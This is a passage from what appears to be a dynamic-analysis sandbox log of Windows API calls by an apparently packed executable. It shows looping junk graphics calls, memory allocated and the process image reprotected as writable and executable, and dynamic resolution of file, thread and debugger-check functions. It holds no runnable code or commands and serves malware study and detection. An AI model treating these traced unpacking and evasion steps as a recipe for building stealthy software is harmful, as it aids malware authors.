returned 0 [0092.510] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.510] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.510] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.510] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.510] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x150401dc [0092.510] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x170401d9 [0092.510] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104792b [0092.510] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104792c [0092.510] CombineRgn (hrgnDst=0x104792b, hrgnSrc1=0x150401dc, hrgnSrc2=0x170401d9, iMode=1) returned 1 [0092.510] CombineRgn (hrgnDst=0x104792c, hrgnSrc1=0x150401dc, hrgnSrc2=0x170401d9, iMode=4) returned 2 [0092.510] CreateSolidBrush (color=0xff) returned 0x210792a [0092.510] CreateSolidBrush (color=0xff0000) returned 0x110792d [0092.511] DeleteObject (ho=0x110792d) returned 1 [0092.511] DeleteObject (ho=0x170401d9) returned 1 [0092.511] DeleteObject (ho=0x150401dc) returned 1 [0092.511] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.511] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.511] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.511] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.511] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.511] BeginPath (hdc=0x0) returned 0 [0092.511] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.511] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.511] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.511] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.511] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.511] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.511] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.511] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.511] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x180401d9 [0092.511] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x160401dc [0092.511] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104792e [0092.511] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104792f [0092.511] CombineRgn (hrgnDst=0x104792e, hrgnSrc1=0x180401d9, hrgnSrc2=0x160401dc, iMode=1) returned 1 [0092.511] CombineRgn (hrgnDst=0x104792f, hrgnSrc1=0x180401d9, hrgnSrc2=0x160401dc, iMode=4) returned 2 [0092.511] CreateSolidBrush (color=0xff) returned 0x210792d [0092.511] CreateSolidBrush (color=0xff0000) returned 0x1107930 [0092.511] DeleteObject (ho=0x1107930) returned 1 [0092.511] DeleteObject (ho=0x160401dc) returned 1 [0092.511] DeleteObject (ho=0x180401d9) returned 1 [0092.511] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.511] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.511] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.511] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.512] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.512] BeginPath (hdc=0x0) returned 0 [0092.512] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.512] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.512] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.512] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.512] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.512] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.512] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.512] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.512] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x170401dc [0092.512] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x190401d9 [0092.512] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047931 [0092.512] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047932 [0092.512] CombineRgn (hrgnDst=0x1047931, hrgnSrc1=0x170401dc, hrgnSrc2=0x190401d9, iMode=1) returned 1 [0092.512] CombineRgn (hrgnDst=0x1047932, hrgnSrc1=0x170401dc, hrgnSrc2=0x190401d9, iMode=4) returned 2 [0092.512] CreateSolidBrush (color=0xff) returned 0x2107930 [0092.512] CreateSolidBrush (color=0xff0000) returned 0x1107933 [0092.512] DeleteObject (ho=0x1107933) returned 1 [0092.512] DeleteObject (ho=0x190401d9) returned 1 [0092.512] DeleteObject (ho=0x170401dc) returned 1 [0092.512] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.512] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.512] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.512] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.512] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.512] BeginPath (hdc=0x0) returned 0 [0092.512] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.512] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.513] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.513] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.513] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.513] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.513] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.513] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.513] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1a0401d9 [0092.513] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x180401dc [0092.513] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047934 [0092.513] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047935 [0092.513] CombineRgn (hrgnDst=0x1047934, hrgnSrc1=0x1a0401d9, hrgnSrc2=0x180401dc, iMode=1) returned 1 [0092.513] CombineRgn (hrgnDst=0x1047935, hrgnSrc1=0x1a0401d9, hrgnSrc2=0x180401dc, iMode=4) returned 2 [0092.513] CreateSolidBrush (color=0xff) returned 0x2107933 [0092.513] CreateSolidBrush (color=0xff0000) returned 0x1107936 [0092.513] DeleteObject (ho=0x1107936) returned 1 [0092.513] DeleteObject (ho=0x180401dc) returned 1 [0092.513] DeleteObject (ho=0x1a0401d9) returned 1 [0092.513] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.513] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.513] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.513] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.513] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.513] BeginPath (hdc=0x0) returned 0 [0092.513] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.513] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.513] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.513] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.513] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.513] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.514] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.514] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.514] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x190401dc [0092.514] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1b0401d9 [0092.514] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047937 [0092.514] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047938 [0092.514] CombineRgn (hrgnDst=0x1047937, hrgnSrc1=0x190401dc, hrgnSrc2=0x1b0401d9, iMode=1) returned 1 [0092.514] CombineRgn (hrgnDst=0x1047938, hrgnSrc1=0x190401dc, hrgnSrc2=0x1b0401d9, iMode=4) returned 2 [0092.514] CreateSolidBrush (color=0xff) returned 0x2107936 [0092.514] CreateSolidBrush (color=0xff0000) returned 0x1107939 [0092.514] DeleteObject (ho=0x1107939) returned 1 [0092.514] DeleteObject (ho=0x1b0401d9) returned 1 [0092.514] DeleteObject (ho=0x190401dc) returned 1 [0093.116] SendMessageA (hWnd=0x1013a, Msg=0xc, wParam=0x0, lParam=0x1885d4) returned 0x1 [0093.116] SendMessageA (hWnd=0x1013a, Msg=0xd, wParam=0x3e8, lParam=0x1885d4) returned 0x9 [0093.116] GetLastError () returned 0x578 [0093.117] EnumTimeFormatsA (lpTimeFmtEnumProc=0x22d0590, Locale=0x400, dwFlags=0x0) [0093.119] GetModuleHandleA (lpModuleName="ntdll") returned 0x76ea0000 [0093.119] GetModuleHandleA (lpModuleName="advapi32") returned 0x75960000 [0093.126] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3fd0000 [0093.207] VirtualFree (lpAddress=0x3fd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.209] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3fd0000 [0093.223] VirtualFree (lpAddress=0x3fd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.225] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3fd0000 [0093.237] VirtualFree (lpAddress=0x3fd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.239] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3fd0000 [0093.302] VirtualFree (lpAddress=0x3fd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.304] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3fd0000 [0093.316] VirtualFree (lpAddress=0x3fd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.319] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3fd0000 [0093.339] VirtualFree (lpAddress=0x3fd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.341] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3fd0000 [0093.354] VirtualFree (lpAddress=0x3fd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.356] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3fd0000 [0093.399] VirtualFree (lpAddress=0x3fd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.401] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3fd0000 [0093.419] VirtualFree (lpAddress=0x3fd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.422] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3fd0000 [0093.439] VirtualFree (lpAddress=0x3fd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.442] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3fd0000 [0093.454] VirtualFree (lpAddress=0x3fd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.457] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3fd0000 [0093.471] VirtualFree (lpAddress=0x3fd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.473] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3fd0000 [0093.485] VirtualFree (lpAddress=0x3fd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.489] GetModuleHandleA (lpModuleName="ntdll") returned 0x76ea0000 [0093.489] GetModuleHandleA (lpModuleName="advapi32") returned 0x75960000 [0093.503] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0093.513] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3fd0000 [0093.527] VirtualFree (lpAddress=0x3fd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.529] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3fd0000 [0093.544] VirtualFree (lpAddress=0x3fd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.550] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3fd0000 [0093.563] VirtualFree (lpAddress=0x3fd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.566] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3fd0000 [0093.579] VirtualFree (lpAddress=0x3fd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.581] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3fd0000 [0093.598] VirtualFree (lpAddress=0x3fd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.600] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3fd0000 [0093.621] VirtualFree (lpAddress=0x3fd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.624] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3fd0000 [0094.076] VirtualProtect (in: lpAddress=0x55820000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x1815c4 | out: lpflOldProtect=0x1815c4*=0x2) returned 1 [0094.076] VirtualProtect (in: lpAddress=0x55821000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x1815c4 | out: lpflOldProtect=0x1815c4*=0x20) returned 1 [0094.076] VirtualProtect (in: lpAddress=0x55822000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x1815c4 | out: lpflOldProtect=0x1815c4*=0x20) returned 1 [0094.076] VirtualProtect (in: lpAddress=0x55823000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x1815c4 | out: lpflOldProtect=0x1815c4*=0x20) returned 1 [0094.076] VirtualProtect (in: lpAddress=0x55824000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x1815c4 | out: lpflOldProtect=0x1815c4*=0x20) returned 1 [0094.076] VirtualProtect (in: lpAddress=0x55825000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x1815c4 | out: lpflOldProtect=0x1815c4*=0x20) returned 1 [0094.077] VirtualProtect (in: lpAddress=0x55826000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x1815c4 | out: lpflOldProtect=0x1815c4*=0x20) returned 1 [0094.077] VirtualProtect (in: lpAddress=0x55827000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x1815c4 | out: lpflOldProtect=0x1815c4*=0x20) returned 1 [0094.077] VirtualProtect (in: lpAddress=0x55828000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x1815c4 | out: lpflOldProtect=0x1815c4*=0x20) returned 1 [0094.077] VirtualProtect (in: lpAddress=0x55829000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x1815c4 | out: lpflOldProtect=0x1815c4*=0x20) returned 1 [0094.077] VirtualProtect (in: lpAddress=0x5582a000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x1815c4 | out: lpflOldProtect=0x1815c4*=0x20) returned 1 [0094.077] VirtualProtect (in: lpAddress=0x5582b000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x1815c4 | out: lpflOldProtect=0x1815c4*=0x20) returned 1 [0094.077] VirtualProtect (in: lpAddress=0x5582c000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x1815c4 | out: lpflOldProtect=0x1815c4*=0x20) returned 1 [0094.077] VirtualProtect (in: lpAddress=0x5582d000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x1815c4 | out: lpflOldProtect=0x1815c4*=0x20) returned 1 [0094.077] VirtualProtect (in: lpAddress=0x5582e000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x1815c4 | out: lpflOldProtect=0x1815c4*=0x20) returned 1 [0094.079] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x75ce0000 [0094.080] GetProcAddress (hModule=0x75ce0000, lpProcName="MoveFileExW") returned 0x75d09b2d [0094.080] GetProcAddress (hModule=0x75ce0000, lpProcName="LocalFree") returned 0x75cf2d3c [0094.080] GetProcAddress (hModule=0x75ce0000, lpProcName="GetCurrentProcess") returned 0x75cf1809 [0094.080] GetProcAddress (hModule=0x75ce0000, lpProcName="GetLastError") returned 0x75cf11c0 [0094.081] GetProcAddress (hModule=0x75ce0000, lpProcName="LoadLibraryExA") returned 0x75cf4913 [0094.081] GetProcAddress (hModule=0x75ce0000, lpProcName="GetModuleFileNameW") returned 0x75cf4950 [0094.082] GetProcAddress (hModule=0x75ce0000, lpProcName="CopyFileW") returned 0x75d1830d [0094.084] GetProcAddress (hModule=0x75ce0000, lpProcName="GetVersionExW") returned 0x75cf1ae5 [0094.084] GetProcAddress (hModule=0x75ce0000, lpProcName="GlobalSize") returned 0x75d0d16f [0094.084] GetProcAddress (hModule=0x75ce0000, lpProcName="LocalAlloc") returned 0x75cf168c [0094.085] GetProcAddress (hModule=0x75ce0000, lpProcName="HeapReAlloc") returned 0x76ee1f6e [0094.085] GetProcAddress (hModule=0x75ce0000, lpProcName="GetProcessHeap") returned 0x75cf14e9 [0094.085] GetProcAddress (hModule=0x75ce0000, lpProcName="GetCurrentProcessId") returned 0x75cf11f8 [0094.085] GetProcAddress (hModule=0x75ce0000, lpProcName="ExitProcess") returned 0x75cf7a10 [0094.086] GetProcAddress (hModule=0x75ce0000, lpProcName="GetOverlappedResult") returned 0x75d0cc79 [0094.086] GetProcAddress (hModule=0x75ce0000, lpProcName="SetEvent") returned 0x75cf16c5 [0094.086] GetProcAddress (hModule=0x75ce0000, lpProcName="SetHandleCount") returned 0x75cfcb29 [0094.086] GetProcAddress (hModule=0x75ce0000, lpProcName="GetHandleInformation") returned 0x75d1cb69 [0094.086] GetProcAddress (hModule=0x75ce0000, lpProcName="SystemTimeToFileTime") returned 0x75cf5a7e [0094.087] GetProcAddress (hModule=0x75ce0000, lpProcName="lstrcmpiW") returned 0x75d0d5cd [0094.087] GetProcAddress (hModule=0x75ce0000, lpProcName="lstrlenW") returned 0x75cf1700 [0094.087] GetProcAddress (hModule=0x75ce0000, lpProcName="TlsFree") returned 0x75cf3587 [0094.087] GetProcAddress (hModule=0x75ce0000, lpProcName="CreateMutexW") returned 0x75cf424c [0094.088] GetProcAddress (hModule=0x75ce0000, lpProcName="OpenMutexA") returned 0x75d0ec6f [0094.088] GetProcAddress (hModule=0x75ce0000, lpProcName="CreateEventA") returned 0x75cf328c [0094.089] GetProcAddress (hModule=0x75ce0000, lpProcName="UnmapViewOfFile") returned 0x75cf1826 [0094.089] GetProcAddress (hModule=0x75ce0000, lpProcName="GetModuleHandleA") returned 0x75cf1245 [0094.089] GetProcAddress (hModule=0x75ce0000, lpProcName="FatalAppExitA") returned 0x75d74691 [0094.089] GetProcAddress (hModule=0x75ce0000, lpProcName="OutputDebugStringA") returned 0x75d1b2b7 [0094.090] GetProcAddress (hModule=0x75ce0000, lpProcName="GetDriveTypeW") returned 0x75cf418b [0094.090] GetProcAddress (hModule=0x75ce0000, lpProcName="FindFirstFileA") returned 0x75cfe2ce [0094.090] GetProcAddress (hModule=0x75ce0000, lpProcName="GetCurrentActCtx") returned 0x75d0d551 [0094.090] GetProcAddress (hModule=0x75ce0000, lpProcName="FindNextFileW") returned 0x75cf54ee [0094.091] GetProcAddress (hModule=0x75ce0000, lpProcName="lstrcpyA") returned 0x75d12a9d [0094.091] GetProcAddress (hModule=0x75ce0000, lpProcName="GetUserDefaultLCID") returned 0x75cf3da5 [0094.091] GetProcAddress (hModule=0x75ce0000, lpProcName="GetStringTypeW") returned 0x75cf1946 [0094.091] GetProcAddress (hModule=0x75ce0000, lpProcName="MultiByteToWideChar") returned 0x75cf192e [0094.092] GetProcAddress (hModule=0x75ce0000, lpProcName="TerminateProcess") returned 0x75d0d802 [0094.092] GetProcAddress (hModule=0x75ce0000, lpProcName="SetUnhandledExceptionFilter") returned 0x75cf87c9 [0094.092] GetProcAddress (hModule=0x75ce0000, lpProcName="UnhandledExceptionFilter") returned 0x75d1772f [0094.092] GetProcAddress (hModule=0x75ce0000, lpProcName="IsDebuggerPresent") returned 0x75cf4a5d [0094.092] GetProcAddress (hModule=0x75ce0000, lpProcName="IsProcessorFeaturePresent") returned 0x75cf5235 [0094.093] GetProcAddress (hModule=0x75ce0000, lpProcName="FindFirstFileW") returned 0x75cf4435 [0094.093] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0094.093] GetProcAddress (hModule=0x75ce0000, lpProcName="SetFileAttributesW") returned 0x75d0d4f7 [0094.093] GetProcAddress (hModule=0x75ce0000, lpProcName="CreateFileW") returned 0x75cf3f5c [0094.094] GetProcAddress (hModule=0x75ce0000, lpProcName="MapViewOfFile") returned 0x75cf18f1 [0094.094] GetProcAddress (hModule=0x75ce0000, lpProcName="GetTickCount") returned 0x75cf110c [0094.094] GetProcAddress (hModule=0x75ce0000, lpProcName="CloseHandle") returned 0x75cf1410 [0094.094] GetProcAddress (hModule=0x75ce0000, lpProcName="FindClose") returned 0x75cf4442 [0094.095] GetProcAddress (hModule=0x75ce0000, lpProcName="SetFilePointer") returned 0x75cf17d1 [0094.095] GetProcAddress (hModule=0x75ce0000, lpProcName="FlushFileBuffers") returned 0x75cf469b [0094.095] GetProcAddress (hModule=0x75ce0000, lpProcName="ReadFile") returned 0x75cf3ed3 [0094.095] GetProcAddress (hModule=0x75ce0000, lpProcName="WriteFile") returned 0x75cf1282 [0094.096] GetProcAddress (hModule=0x75ce0000, lpProcName="GetFileSize") returned 0x75cf196e [0094.096] GetProcAddress (hModule=0x75ce0000, lpProcName="Sleep") returned 0x75cf10ff [0094.096] GetProcAddress (hModule=0x75ce0000, lpProcName="WaitForSingleObject") returned 0x75cf1136 [0094.096] GetProcAddress (hModule=0x75ce0000, lpProcName="SetErrorMode") returned 0x75cf1b00 [0094.097] GetProcAddress (hModule=0x75ce0000, lpProcName="CreateThread") returned 0x75cf34d5 [0094.097] GetProcAddress (hModule=0x75ce0000, lpProcName="VirtualFree") returned 0x75cf186e [0094.097] GetProcAddress (hModule=0x75ce0000, lpProcName="OutputDebugStringW") returned 0x75d1d1d4 [0094.097] GetProcAddress (hModule=0x75ce0000, lpProcName="LoadLibraryExW") returned 0x75cf495d [0094.098] GetProcAddress (hModule=0x75ce0000, lpProcName="LoadLibraryW") returned 0x75cf492b [0094.098] GetProcAddress (hModule=0x75ce0000, lpProcName="CreateFileMappingW") returned 0x75cf1909 [0094.098] GetProcAddress (hModule=0x75ce0000, lpProcName="lstrlenA") returned 0x75cf5a4b [0094.099] GetProcAddress (hModule=0x75ce0000, lpProcName="lstrcatW") returned 0x75d1828e [0094.099] GetProcAddress (hModule=0x75ce0000, lpProcName="GetOEMCP") returned 0x75d1d1a1 [0094.099] GetProcAddress (hModule=0x75ce0000, lpProcName="lstrcpyW") returned 0x75d13102 [0094.099] GetProcAddress (hModule=0x75ce0000, lpProcName="VirtualAlloc") returned 0x75cf1856 [0094.100] GetProcAddress (hModule=0x75ce0000, lpProcName="GlobalFree") returned 0x75cf5558 [0094.100] GetProcAddress (hModule=0x75ce0000, lpProcName="GetDateFormatA") returned 0x75d1a959 